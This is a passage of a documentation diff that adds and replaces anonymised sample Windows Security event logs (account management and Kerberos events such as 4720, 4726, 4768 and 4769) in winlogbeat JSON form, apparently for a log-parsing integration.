+ "record_id": 8884538, + "api": "wineventlog", + "opcode": "Info" + }, + "host": { + "hostname": "host01", + "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "ip": [ + "8.8.8.8" + ], + "name": "host01", + "mac": [ + "00-11-22-33-44-55" + ], + "architecture": "x86_64", + "os": { + "build": "20348.2031", + "version": "10.0", + "name": "Windows Server 2022 Standard", + "family": "windows", + "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", + "type": "windows", + "platform": "windows" + } + }, + "log": { + "level": "information" + }, + "ecs": { + "version": "8.0.0" + }, + "agent": { + "type": "winlogbeat", + "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", + "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", + "version": "8.10.4", + "name": "HOST01" + } + } + ``` + + + +=== "security_event_4689" + + + ```json + { + "event": { + "provider": "Microsoft-Windows-Security-Auditing", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "code": "4689", + "outcome": "success", + "created": "2024-11-12T09:10:18.932Z", + "action": "Process Termination", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:10:13.534Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "channel": "Security", + "task": "Process Termination", + "computer_name": "ACCOUNT_01.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "event_data": { + "SubjectLogonId": "0x3e7", + "Status": "0x0", + "ProcessId": "0x1df8", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3", + "ProcessName": "C:\\Windows\\System32\\process.exe" + }, + "process": { + "thread": { + "id": 620 + }, + "pid": 4 + }, + "event_id": "4689", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 1564712 + }, + "@version": "1" + } + ``` + + + +=== "security_event_4720" + + + ```json + { + "tags": [ + "forwarded", + "beats_input_raw_event" + ], + "@version": "1", + "host": { + "name": "HOST01.reseau.company" + }, + "type": "winlogbeat", + "ecs": { + "version": "1.8.0" + }, + "agent": { + "version": "7.12.1", + "name": "AGENT", + "hostname": "AGENT", + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "type": "winlogbeat" + }, + "@timestamp": "2024-11-12T04:47:02.389Z", + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "event": { + "outcome": "success", + "action": "added-user-account", + "category": [ + "iam" + ], + "module": "security", + "kind": "event", + "code": 4720, + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "user", + "creation" + ], + "created": "2024-11-12T04:47:08.322Z" + }, + "fields": { + "env_AD": "AD Company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name", + "USER" + ] + }, + "winlog": { + "event_data": { + "SubjectUserSid": "S-1-2-3", + "SubjectDomainName": "RESEAU-COMPANY", + "PrivilegeList": "-", + "UserWorkstations": "-", + "SubjectLogonId": "0x2a4b2040", + "SidHistory": "-", + "TargetUserName": "USER", + "TargetDomainName": "RESEAU-COMPANY", + "OldUacValue": "0x0", + "SubjectUserName": "user-name", + "UserPrincipalName": "USER@reseau.company", + "HomeDirectory": "-", + "AccountExpires": "%%1794", + "SamAccountName": "USER", + "ProfilePath": "-", + "HomePath": "-", + "DisplayName": "-", + "PasswordLastSet": "%%1794", + "AllowedToDelegateTo": "-", + "ScriptPath": "-", + "UserParameters": "-", + "NewUacValue": "0x214", + "LogonHours": "%%1793", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "PrimaryGroupId": "513", + "TargetSid": "S-1-2-3-4-5-6-7" + }, + "record_id": 479720536, + "process": { + "thread": { + "id": 1940 + }, + "pid": 612 + }, + "opcode": "Info", + "api": "wineventlog", + "event_id": 4720, + "logon": { + "id": "0x2a4b2040" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "task": "User Account Management", + "computer_name": "HOST01.reseau.company", + "channel": "Security" + } + } + ``` + + + +=== "security_event_4722" + + + ```json + { + "@timestamp": "2024-11-12T08:53:57.535Z", + "event": { + "action": "User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4722", + "created": "2024-11-12T08:53:58.677Z", + "kind": "event", + "dataset": "system.security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN" + }, + "message": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "User Account Management", + "channel": "Security", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "event_data": { + "TargetUserName": "ACC_NAME", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "account-name", + "TargetDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserSid": "S-1-2-3", + "TargetSid": "S-1-2-3-4-5" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.domain.com", + "record_id": 13042939152, + "event_id": "4722" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "name": "pc01", + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "1.2.3.4" + ] + } + } + ``` + + + +=== "security_event_4723" + + + ```json + { + "@timestamp": "2024-11-12T08:59:04.757Z", + "event": { + "action": "User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4723", + "created": "2024-11-12T08:59:05.295Z", + "kind": "event", + "dataset": "system.security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-" + }, + "message": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "elastic_agent": { + "version": "8.14.1", + "id": "123456-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "User Account Management", + "channel": "Security", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "event_data": { + "PrivilegeList": "-", + "TargetUserName": "ACCOUNT", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "ACCOUNT", + "TargetDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserSid": "S-1-2-3", + "TargetSid": "S-1-2-3" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.domain.com", + "record_id": 13043050897, + "event_id": "4723" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "123456-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "name": "pc01", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "1.2.3.4" + ] + } + } + ``` + + + +=== "security_event_4725" + + + ```json + { + "@timestamp": "2024-11-12T08:41:11.055Z", + "event": { + "action": "User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4725", + "created": "2024-11-12T08:41:11.637Z", + "kind": "event", + "dataset": "system.security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN" + }, + "message": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "User Account Management", + "channel": "Security", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "event_data": { + "TargetUserName": "ACCOUNT", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "jdoe", + "TargetDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserSid": "S-1-2-3", + "TargetSid": "S-4-5-6" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.domain.com", + "record_id": 13042691344, + "event_id": "4725" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-2222-3333-4444-555555555555" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "name": "pc01", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, "ip": [ - "1.2.3.4", - "fe80::abcd:123:456" + "1.2.3.4" ] - }, - "event_ingest_logstash": "2023-11-09T09:05:14.912238Z", - "fields.gdp-logstash": "5", - "@version": "1" + } } ``` -=== "security_event_4688" +=== "security_event_4726" ```json { - "tags": [ - "beats_input_codec_plain_applied" - ], + "@version": "1", + "log": { + "level": "information" + }, + "@timestamp": "2024-11-12T07:58:13.288Z", + "message": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", "event": { - "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", - "action": "Process Creation", - "kind": "event", + "action": "User Account Management", "outcome": "success", - "created": "2023-11-09T08:43:52.407Z", + "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", - "code": "4688" + "kind": "event", + "created": "2024-11-12T07:58:14.553Z" }, - "@version": "1", - "@timestamp": "2023-11-09T08:43:51.462Z", - "message": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "agent": { + "hostname": "hostname", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "type": "winlogbeat", + "name": "hostname", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "version": "7.17.1" + }, + "zone": "int", + "site": "site", "winlog": { - "computer_name": "HOST01.company.test", - "provider_name": "Microsoft-Windows-Security-Auditing", + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", "channel": "Security", - "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", - "keywords": [ - "Audit Success" - ], - "version": 2, - "event_id": "4688", "process": { - "pid": 4, + "pid": 632, "thread": { - "id": 17028 + "id": 2056 } }, - "task": "Process Creation", "event_data": { - "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", - "TokenElevationType": "%%1936", - "MandatoryLabel": "S-1-2-3", - "TargetUserSid": "S-1-0-0", - "SubjectUserSid": "S-1-1-1", - "SubjectDomainName": "COMPANY", - "SubjectLogonId": "0x3e7", - "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", - "NewProcessId": "0x1d9c", - "TargetDomainName": "-", - "ProcessId": "0x2a0", - "SubjectUserName": "HOST01$", - "TargetUserName": "-", - "NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", - "TargetLogonId": "0x0" + "SubjectLogonId": "0x3005c1f76", + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a", + "TargetDomainName": "DOMAIN" }, - "record_id": 8884538, + "record_id": 25349190364, + "event_id": "4726", "api": "wineventlog", - "opcode": "Info" - }, - "host": { - "hostname": "host01", - "id": "abcdefgh-1234-5678-abcd-efgh12345678", - "ip": [ - "8.8.8.8" - ], - "name": "host01", - "mac": [ - "00-11-22-33-44-55" - ], - "architecture": "x86_64", - "os": { - "build": "20348.2031", - "version": "10.0", - "name": "Windows Server 2022 Standard", - "family": "windows", - "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", - "type": "windows", - "platform": "windows" - } - }, - "log": { - "level": "information" + "provider_name": "Microsoft-Windows-Security-Auditing", + "task": "User Account Management", + "computer_name": "hostname.domain.net" }, "ecs": { - "version": "8.0.0" + "version": "1.12.0" }, - "agent": { - "type": "winlogbeat", - "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", - "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", - "version": "8.10.4", - "name": "HOST01" - } + "host": { + "name": "hostname.domain.net" + }, + "tags": [ + "windows", + "domain-controller", + "beats_input_codec_plain_applied" + ] } ``` @@ -2147,6 +3213,156 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_event_4768" + + + ```json + { + "event": { + "provider": "Microsoft-Windows-Security-Auditing", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "code": "4768", + "outcome": "success", + "created": "2024-11-12T09:17:12.392Z", + "action": "Service d\u2019authentification Kerberos", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:17:10.124Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "host": { + "name": "HOSTNAME.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "channel": "Security", + "task": "Service d\u2019authentification Kerberos", + "computer_name": "HOSTNAME.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "event_data": { + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010", + "IpPort": "51261", + "TargetDomainName": "DOMAIN", + "TargetUserName": "account", + "TargetSid": "S-1-2-3", + "PreAuthType": "2", + "Status": "0x0", + "ServiceSid": "S-1-2-3-4-5", + "IpAddress": "::ffff:1.2.3.4", + "ServiceName": "service" + }, + "process": { + "thread": { + "id": 3228 + }, + "pid": 560 + }, + "event_id": "4768", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 2476587536 + }, + "@version": "1" + } + ``` + + + +=== "security_event_4769" + + + ```json + { + "event": { + "provider": "Microsoft-Windows-Security-Auditing", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "code": "4769", + "outcome": "success", + "created": "2024-11-12T09:17:05.023Z", + "action": "Op\u00e9rations de ticket du service Kerberos", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:17:02.856Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "host": { + "name": "HOST01.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "channel": "Security", + "task": "Op\u00e9rations de ticket du service Kerberos", + "computer_name": "HOST01.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "event_data": { + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "IpPort": "50754", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TransmittedServices": "-", + "IpAddress": "::ffff:1.2.3.4", + "ServiceName": "SERVICE$" + }, + "process": { + "thread": { + "id": 7992 + }, + "pid": 560 + }, + "event_id": "4769", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 2476587153 + }, + "@version": "1" + } + ``` + + + === "security_event_4771" @@ -2392,6 +3608,112 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_event_4798" + + + ```json + { + "@timestamp": "2024-11-12T08:25:34.741Z", + "event": { + "action": 